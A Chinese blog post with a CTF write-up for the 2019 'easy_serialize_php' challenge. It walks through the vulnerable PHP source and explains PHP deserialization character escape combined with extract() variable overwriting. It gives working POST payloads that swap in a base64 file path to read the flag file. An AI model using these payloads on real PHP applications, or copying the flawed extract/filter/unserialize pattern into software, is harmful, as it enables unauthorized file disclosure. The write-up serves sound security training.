[安洵杯 2019]easy_serialize_php

最新推荐文章于 2023-03-30 10:44:51 发布
最新推荐文章于 2023-03-30 10:44:51 发布
阅读量450 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/107733132
版权

题目

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

过程
1.分析代码,发现phpinfo,随后发现d0g3_f1ag.php,访问无果,怀疑是flag所在
图片.png
2.这个题目里根本没有读取session文件,这个题只是把$_SESSION数组进行了serialize(),这种地方不要因为看到php处理器而犯迷糊。
$serialize_info = filter(serialize($_SESSION));

过滤函数filter()是对serialize($_SESSION)进行过滤,滤掉一些关键字

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}

我们发现unset函数将$_SESSION销毁了。
然后重新赋予$_SESSION了新的值。

if($_SESSION){
    unset($_SESSION);
}

3.最后调用了extract($_POST)。extract() 函数从数组中将变量导入到当前的符号表。根据extract()我们可以进行变量覆盖,
当我们传入SESSION[flag]=123时,$SESSION[“user”]和$SESSION[‘function’] 全部会消失。
只剩下SESSION[flag]=123。

f参数要传为show_image,其次可控点就是img_path下的img,但是不能直接传,因为会进行一系列加密。当f=show_image是可以读文件的,只要$userinfo[‘img’]是相应的flag.php的base64加密,所以我们先记住这个点,一会肯定要用

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

4.在php中,反序列化的过程中必须严格按照序列化规则才能成功实现反序列化
如果我们在str结尾的花括号后再增加一些字符呢?

<?php
$str='a:2:{i:0;s:8:"Hed9eh0g";i:1;s:5:"aaaaa";}abc';
var_dump(unserialize($str));
?>

图片.png
仍然可以输出上面的结果,这说明反序列化的过程是有一定识别范围的,在这个范围之外的字符(第二个例子里的abc)都会被忽略,不影响反序列化的正常进行。
5.

<?php
$_SESSION["user"]='flagflagflagflagflagflag';
$_SESSION["function"]='a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION["img"]='L2QwZzNfZmxsbGxsbGFn';
echo serialize($_SESSION);
?>

图片.png

假设后台存在一个过滤机制,会将含flag字符替换为空,那么以上序列化字符串过滤结果为
a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
将这串字符串进行序列化会得到什么? 这个时候关注第二个s所对应的数字,本来由于有6个flag字符所以为24,现在这6个flag都被过滤了,那么它将会尝试向后读取24个字符看看是否满足序列化的规则,也即读取;s:8:“function”;s:59:"a,读取这24个字符后以”;结尾,恰好满足规则,而后第三个s向后读取img的20个字符,第四个、第五个s向后读取均满足规则,所以序列化结果为:

array(3) { 
["user"]=> string(24) "";s:8:"function";s:59:"a" 
["img"]=> string(20) "ZDBnM19mMWFnLnBocA==" 
["dd"]=> string(1) "a" 
}

数组形式:

$_SESSION["user"]='";s:8:"function";s:59:"a';
$_SESSION["img"]='ZDBnM19mMWFnLnBocA==';
$_SESSION["dd"]='a';

可以发现,SESSION数组的键值img对应的值发生了改变。 设想,如果我们能够控制原来SESSION数组的funcion的值但无法控制img的值,我们就可以通过这种方式间接控制到img对应的值。这个感觉就像sql注入一样,他本来想读取的base64编码是:L2QwZzNfZmxsbGxsbGFn(/d0g3_fllllllag),但是由于过滤掉了flag,向后读取的过程中把键值function放到了第一个键值的内容里面,用ZDBnM19mMWFnLnBocA==代替了真正的base64编码,读取了d0g3_f1ag.php的内容。而识别完成后最后面的";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}被忽略掉了,不影响正常的反序列化过程。
6.payload构造思路
从序列化内容来看,不难发现,SESSION有个三个键
分别为user,function,img
控制img的值,就得放一个让img变成base64加密后的d0g3_f1ag.php
由此构造payload
键值逃逸:
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=p";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"ab";s:2:"sb";}
键名逃逸:
_SESSION[flagphp]=;s:2:"db";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
7.get去传show_image
图片.png
再将d0g3_fllllllag的base64重新传入
图片.png

浩歌已行
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
------已搬运-------BUUCTF:[安洵 2019]easy_serialize_php 1(extract,字符逃逸 session反序列化的另类~.~ )
Zero_Adam的博客
02-06 633
学到的 extract的覆盖数组的操作比如能够覆盖SESSION这个全局数组! 看phpinfo时的注意点 代码审计的能力 字符串逃逸,之前还有一条路可以走,但是后来发现走不通,不过也是个好思路 劝像我一样的rookies。本地自己实验很重要,那些大佬们的payload也是不知实验了多少次才出来的。本地实验的多了,自己也就明白了 源码+我的一些注释 源码多看几遍,找找思路,灵感 <?php $function = @$_GET['f']; function filter($img){ $f
2017年全国大学生信息安全竞赛 wanna to see your hat?
烟敛寒林的博客
05-13 790
题目内容:http://117.50.3.97:1515/route.php?act=index 进入题目后,由于没有找到什么特别的信息, 因此这里对这个网页进行目录扫描和源码泄露扫描, 发现有源码泄露 源码恢复工具 -->> https://github.com/kost/dvcs-ripper 在kali中用这个工具获得源码 部分关键代码...
buuctf刷题之旅之web(二)
qq_50589021的博客
08-19 3396
2021-5-23 [BUUCTF 2018]Online Tool 题目: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GE
php中if ($_session['u_id']){,php使用session来控制仅有一个账号登录应用
weixin_33510623的博客
03-28 237
首先使用一个浏览器来访问应用的一个页面 multex_session1.php要记录当前账号所使用的sessionId,使用session_id()获取到当前的sessionId然后用另一个浏览器和同一个账号访问另一个页面 multex_session2.php在该页面中会找到该账号之前使用的sessionId,然后清除该sessionId保存的所有内容,然后重新写入session值,并将新的se...
2021-7-22 [安洵 2019]easy_serialize_php 知识点:变量覆盖,php反序列化字符串逃逸
m0_51326092的博客
07-22 531
文章目录前言重要知识点变量覆盖:PHP序列化和反序列化解题过程总结 前言 本身是要在昨天解这题的,结果解着解着就去做了session反序列化的题目了o(╥﹏╥)o,于是昨天的题今天做(o)/~,这个知识点也是第一次遇到,菜菜的我学习到了,翻阅了很多大佬的博客才一知半解,需要继续努力!!! 重要知识点 变量覆盖: extract示例讲解网站 extract(): 作用: 从数组中将变量导入到当前的符号表;该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的
[安洵 2019]easy_serialize_php(有思考过程)
v2ish1yan的博客
04-20 3084
[安洵 2019]easy_serialize_php 反序列化
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
se_mouz_image.rar_serialize_序列化
09-23
PHP中,`serialize()`函数就是用来将变量转化为字符串,这样就可以方便地存储或者通过网络发送。在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
PHP基础知识 - 会话控制 - session
Chon.Wang
07-18 284
PHP 会话控制 session
buuctf刷题9 (反序列化逃逸&shtml-SSI远程命令执行&idna与utf-8编码漏洞)
weixin_63231007的博客
10-20 1979
如果我们传入 _SESSION[imgflagphp]=1111 会发现 s:10:"img" 我们输入的flagphp被替换为了空,只剩下了img,这样就有反序列化逃逸那味了,逃逸了7个字符。序列化串为:a:4:{s:5:"phone";因为我们要让img的内容为d0g3_f1ag.phpbase64编码后的字符串,所以要传_SESSION[img]=s:3:"img";看一下这个序列化串:a:2:{s:10:"img";s:3:"img";
[安洵 2019]easy_serialize_php---关于php反序列化的一些思考
StevenOnesir的博客
12-21 250
这道题值得拿出来说一下,是因为涉及到了反序列化逃逸的一些基本知识 首先有几个点值得去思考一下,我们知道一般序列化的格式是: {i:5;s:9:"aaaaaaaaa";} 上面的序列化格式其实表示的是一个整数变量值为100与一个String值为"aaaaaaaaa"。 如果我们在序列化好的字符串中加入 ;} 字符就能在中间起到反序列化时的截断效果。同时如果前面的字符数、类型等正常对应,反序列化时是能正常解析并起到覆盖变量的效果的,这就叫做php反序列化的字符逃逸。 我们构建payload只需要保证这一点就行
buuctf[安洵 2019]easy_serialize_php
最新发布
2202_75317918的博客
03-30 474
buuctf[安洵 2019]easy_serialize_php
buuctf easy_serialize_php
qq_52671379的博客
03-30 1882
buuctf easy_serialize_php
[安洵 2019]easy_serialize_php 1
03-16
$serialized = serialize($data); echo $serialized; ?> ``` 最终输出的序列化字符串为: ``` O:4:"User":2:{s:4:"name";s:5:"Alice";s:3:"age";i:20;} ``` 其中,`O:4:"User":2:` 表示这是一个类名为 `User` 的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值